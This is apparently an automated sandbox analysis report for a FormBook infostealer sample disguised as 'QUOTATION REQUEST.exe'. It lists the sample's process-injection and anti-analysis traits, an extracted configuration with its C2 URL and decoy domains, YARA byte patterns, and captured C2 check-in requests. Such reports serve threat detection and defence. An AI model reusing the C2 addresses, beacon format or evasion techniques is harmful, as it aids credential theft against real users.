Loading ...

Play interactive tourEdit tour

Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Sample Name:QUOTATION REQUEST.exe
Analysis ID:402973
MD5:64af41000584694858d0fcc37b1bf69b
SHA1:707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256:fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • QUOTATION REQUEST.exe (PID: 4660 cmdline: 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: 64AF41000584694858D0FCC37B1BF69B)
    • QUOTATION REQUEST.exe (PID: 4112 cmdline: C:\Users\user\Desktop\QUOTATION REQUEST.exe MD5: 64AF41000584694858D0FCC37B1BF69B)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5268 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5784 cmdline: /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.QUOTATION REQUEST.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.QUOTATION REQUEST.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.QUOTATION REQUEST.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        3.2.QUOTATION REQUEST.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.QUOTATION REQUEST.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 4 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: QUOTATION REQUEST.exeVirustotal: Detection: 18%Perma Link
          Source: QUOTATION REQUEST.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: QUOTATION REQUEST.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: QUOTATION REQUEST.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
          Source: Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 4x nop then pop ebx3_2_00406AA3
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 4x nop then pop edi3_2_0040C3C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx9_2_00ED6AA3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi9_2_00EDC3C3

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.pedroiniesta.net/n7ad/
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1Host: www.letsratethis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1Host: www.cannabisllp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1Host: www.buffalobooze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1Host: www.checkmytradesmanswork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1Host: www.inthebeginningshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1Host: www.madisonroselove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1Host: www.pedroiniesta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1Host: www.freecleanlimpieza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1Host: www.graet.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 46.30.211.38 46.30.211.38
          Source: Joe Sandbox ViewIP Address: 81.17.18.196 81.17.18.196
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1Host: www.letsratethis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1Host: www.cannabisllp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1Host: www.buffalobooze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1Host: www.checkmytradesmanswork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1Host: www.inthebeginningshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1Host: www.madisonroselove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1Host: www.pedroiniesta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1Host: www.freecleanlimpieza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1Host: www.graet.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.sloanksmith.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Mon, 03 May 2021 14:51:02 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7
          Source: explorer.exe, 00000005.00000000.253105057.00000000089FF000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
